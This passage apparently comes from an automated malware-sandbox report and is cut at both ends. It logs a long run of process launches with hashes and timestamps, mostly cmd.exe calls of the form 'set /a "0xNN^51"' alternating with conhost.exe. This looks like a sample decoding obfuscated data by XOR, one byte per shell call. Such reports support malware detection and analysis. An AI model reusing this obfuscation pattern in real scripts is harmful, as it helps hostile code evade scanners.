                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:12
                          Start time:20:25:46
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:13
                          Start time:20:25:46
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x7F^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:14
                          Start time:20:25:46
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:15
                          Start time:20:25:46
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x00^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:16
                          Start time:20:25:46
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:17
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x01^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:18
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:19
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x09^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:20
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:21
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x09^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:22
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:23
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x70^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:24
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:25
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x41^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:26
                          Start time:20:25:47
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:27
                          Start time:20:25:48
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x56^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:28
                          Start time:20:25:48
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:29
                          Start time:20:25:48
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x52^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:30
                          Start time:20:25:48
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:31
                          Start time:20:25:48
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x47^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:32
                          Start time:20:25:48
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:33
                          Start time:20:25:48
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x56^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:34
                          Start time:20:25:48
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:35
                          Start time:20:25:48
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x75^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:36
                          Start time:20:25:49
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:37
                          Start time:20:25:49
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x5A^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:38
                          Start time:20:25:49
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:39
                          Start time:20:25:49
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x5F^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:40
                          Start time:20:25:49
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:41
                          Start time:20:25:49
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x56^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:42
                          Start time:20:25:49
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:43
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x72^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:44
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:45
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x1B^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:46
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:47
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x5E^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:48
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:49
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:50
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:51
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x41^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:52
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:53
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x07^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:54
                          Start time:20:25:50
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:55
                          Start time:20:25:51
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:56
                          Start time:20:25:51
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:57
                          Start time:20:25:51
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x1F^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:58
                          Start time:20:25:51
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:59
                          Start time:20:25:51
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:60
                          Start time:20:25:51
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:61
                          Start time:20:25:51
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x5A^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:62
                          Start time:20:25:51
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:63
                          Start time:20:25:52
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x13^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:64
                          Start time:20:25:52
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:65
                          Start time:20:25:52
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:66
                          Start time:20:25:52
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:67
                          Start time:20:25:52
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x4B^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:68
                          Start time:20:25:52
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:69
                          Start time:20:25:52
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x0B^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:70
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:71
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:72
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:73
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:74
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:75
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:76
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:77
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:78
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:79
                          Start time:20:25:53
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:80
                          Start time:20:25:54
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:81
                          Start time:20:25:54
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:82
                          Start time:20:25:54
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:83
                          Start time:20:25:54
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x03^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:84
                          Start time:20:25:54
                          Start date:08/08/2022
                          Path:C:\Windows\System32\Conhost.exe
                          Wow64 process (32bit):
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:
                          File size:875008 bytes
                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:85
                          Start time:20:25:54
                          Start date:08/08/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):
                          Commandline:cmd.exe /c set /a "0x1F^51"
                          Imagebase:
                          File size:236544 bytes
                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                          Has elevated privileges:
                          Has administrator privileges:
                          Programmed in:C, C++ or other language

                          Target ID:86
                          Start time:20:25:54
